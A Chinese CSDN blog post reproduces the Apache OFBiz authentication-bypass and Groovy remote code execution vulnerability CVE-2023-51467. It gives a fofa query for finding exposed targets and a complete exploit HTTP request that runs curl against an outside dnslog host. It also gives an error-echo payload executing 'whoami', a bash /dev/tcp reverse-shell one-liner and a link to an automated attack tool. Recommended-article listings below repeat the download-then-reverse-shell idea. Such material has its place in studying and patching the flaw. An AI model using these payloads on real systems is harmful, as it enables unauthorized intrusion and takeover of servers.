Apache OFBiz groovy 远程代码执行漏洞(CVE-2023-51467)复现

最新推荐文章于 2024-04-24 10:42:37 发布
最新推荐文章于 2024-04-24 10:42:37 发布
阅读量497 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: apache 漏洞复现 安全漏洞 OFBiz RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135461602
版权

Apache OFBiz groovy 远程代码执行漏洞,攻击者可构造请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行。

1.漏洞级别

高危

2.漏洞搜索

fofa

app="Apache_OFBiz"

3.影响范围

Apache OFBiz <= 18.12.10

4.漏洞复现

构造请求包

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

groovyProgram=import%20groovy.lang.GroovyShell%0d%0a%0d%0aGroovyShell%20shell%20%3d%20new%20GroovyShell()%3b%0d%0ashell.evaluate('%22curl%20CVE-2023-51467.y6x162.ceye.io%22.execute()')

如果dnslog收到了响应,证明漏洞存在
在这里插入图片描述注:content-type为必须正确的,否则服务器会解析失败 导致无法正常响应

5.漏洞利用进阶

5.1 利用脚本

由于该漏洞本身无回显,所以可以利用java报错机制来产生回显,构造如下payload

groovyProgram=throw+new+Exception%28%22whoami%22.execute%28%29.text%29%3B

这种情况下会直接触发java报错 返回到页面,效果如下:
在这里插入图片描述

感兴趣的可以直接查看这个项目,有自动化的利用工具:

https://github.com/D0g3-8Bit/OFBiz-Attack

5.2 反弹shell

我们也可以通过直接反弹shell的方式来进一步利用。

bash -i >& /dev/tcp/ip/port 0>&1

注:反弹shell很可能会触发安全机制 导致反弹失败。

在这里插入图片描述

fly夏天
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
【web安全】CVE漏洞复现
weixin_46301214的博客
11-22 411
漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件。当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件。【CVE-2018-1273】springboot漏洞 - RCE。【CVE-2018-1273】springboot漏洞 - RCE。POC:篡改post传参的输入命令即可触发RCE。云服务器开启端口监听,然后执行一下文件即可。存在路径后,随便输入点东西,然后抓包。特点:无回显触发RCE。先扫路径:/users。
Goby 漏洞发布| Apache OFBiz webtools/control/ProgramExport 远程代码执行漏洞CVE-2023-51467
m0_46699477的博客
12-28 622
Apache OFBiz 是一个开源的企业资源规划(ERP)系统,提供了多种商业功能和模块。Apache OFBiz 在 webtools/control/ProgramExport 存在代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
复现Apache OFBiz RCE漏洞(CVE-2023-51467)_03
fushuang333的博客
12-30 848
Apache OFBiz RCE漏洞。通过提交恶意构造的参数破坏命令语句结构,会执行恶意命令,甚至控制整个服务器。
【已复现Apache OFBiz 远程代码执行漏洞(CVE-2023-51467)安全风险通告
smellycat000的专栏
01-03 573
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache OFBiz 远程代码执行漏洞漏洞编号QVD-2023-48721,CVE-2023-51467公开时间2023-12-27影响对象数量级万级奇安信评级高危CVSS 3.1分数9.8威胁类型代码执行利用可能性高POC状态已公开在野利用状态未发现EXP状态未公开技术细节状态已公开危害描述:未授权的攻击者可以在目标服务器上执行任意...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1064
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞CVE-2015-1427)
黑白的博客
12-13 634
声明 好好学习,天天向上 漏洞描述 和3210的漏洞很像,也是恶意代码执行漏洞,3210是执行任意MVEL表达式和java代码,3210之后MVEL表达式被弃用,ES的动态脚本语言换成了Groovy(而且增加了sandbox),然额换成Groovy之后仍然存在恶意代码执行漏洞 影响范围 Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 复现过程 这里使用v1.4.2版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-
Groovy 反序列化漏洞分析(CVE-2015-3253)
weixin_30519071的博客
10-08 673
0x00 前言 Java反序列化的漏洞爆发很久了,此前一直想学习一下。无奈Java体系太过于复杂,单是了解就花了我很久的时间,再加上懒,就一直拖着,今天恰好有空,参考@iswin大佬两年前的分析,我自己跟踪了一下流程,并按自己的想法重写了一下POC,在此做个记录。 0x01 漏洞环境搭建 首先我们需要明确的是,该漏洞影响的范围是Groovy 1.7.0-2.4.3。我们借助...
CVE-2015-1427 ElasticSearch(Groovy 沙盒绕过 && 代码执行漏洞
weixin_51387754的博客
11-17 2216
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞
浅笑996的博客
11-22 1889
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
CVE-2020-9496 ofbiz反序列化漏洞分析1
CVE-2021-26295-Apache-OFBiz:CVE-2021-26295 Apache OFBiz rmi反序列化POC
03-25
CVE-2021-26295-Apache-OFBiz CVE-2021-26295 Apache OFBiz rmi反序列化POC需要将ysoserial.jar放置在目录下,并且不能使用java的高版本
ofbizApache OFBiz-主要开发已移至ofbiz-frameworks存储库
02-03
ApacheOFBiz:registered: 欢迎使用ApacheOFBiz:registered: ! 一个功能强大的顶级Apache软件项目。 OFBiz是用Java编写的企业资源计划(ERP)系统,并包含大量库,实体,服务和功能,以运行您的业务的各个方面。 ...
apache-ofbiz-13.07.02.zip
08-14
apache-ofbiz-13.07.02.zip
深入理解Java消息中间件-Apache Kafka
u011532237的博客
04-21 1459
Apache Kafka是一个开源的分布式事件流平台,由LinkedIn创建,并于2011年贡献给了Apache软件基金会。它设计用来高效处理实时数据流和大数据,通过发布-订阅的消息系统提供高吞吐量、持久存储、流数据处理等功能。
Apache Answer 开源问答社区安装体验
人人都懂物联网
04-20 1285
是由 SegmentFault 思否团队打造的一款问答平台软件,后端使用 Go 语言编写,于2022年10月24日(程序员节)正式开源。你可以免费使用 Answer 高效地搭建一个问答社区,并用于产品技术问答、客户支持、用户交流等场景。2023年10月9日,Answer 顺利通过投票,以全票通过的优秀表现正式进入 Apache 软件基金会(ASF)孵化器。10月18日,Answer 项目正式移交到 Apache 软件基金会名下,从此改名为 Apache Answer。
原生小程序自定义vantUI中van-collapse手风琴组件的标题
最新发布
文龙刚的博客
04-24 296
代码】原生小程序自定义vantUI中van-collapse手风琴组件的标题。
《HCIP-openEuler实验指导手册》1.4 Apache MPM工作模式调整
xzzteach的博客
04-23 538
查看MPM当前工作模式方法一:方法二:浏览器访问:http://IP:端口/server-status查看是否开启(是否注释)修改MPM工作模式。
apache和IIS区别?内网本地服务器项目怎么让外网访问?
2301_78526279的博客
04-22 664
在使用web服务器之前都需要进行配置,在配置方便性方面,IIS的配置比较简单,但是在使用的过程中容易出现服务器内部错误(500错误),有时还会发生假死的情况。IIS在出道之初,安全性不是很有保障,黑客很容易对其进行攻击,但在IIS6版本及更高版本中,windows对其安全性有了很大的改进,其安全性有了很大提高。Apache和IIS是比较常用的搭建服务器的中间件,它们之间还是有一些区别差异的,下面就详细说说 Apache和IIS有哪些区别,以及如何利用快解析实现内网主机应用让外网访问。指应用软件本身端口。
CVE-2020-9496
08-31
CVE-2020-9496是Apache Ofbiz组件中的一个漏洞。根据引用和引用的内容,该漏洞被评级为高危,漏洞评分为8.0。这个漏洞的具体细节和复现可以参考引用中的文章。根据引用的内容,该漏洞是通过利用Apache Ofbiz中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值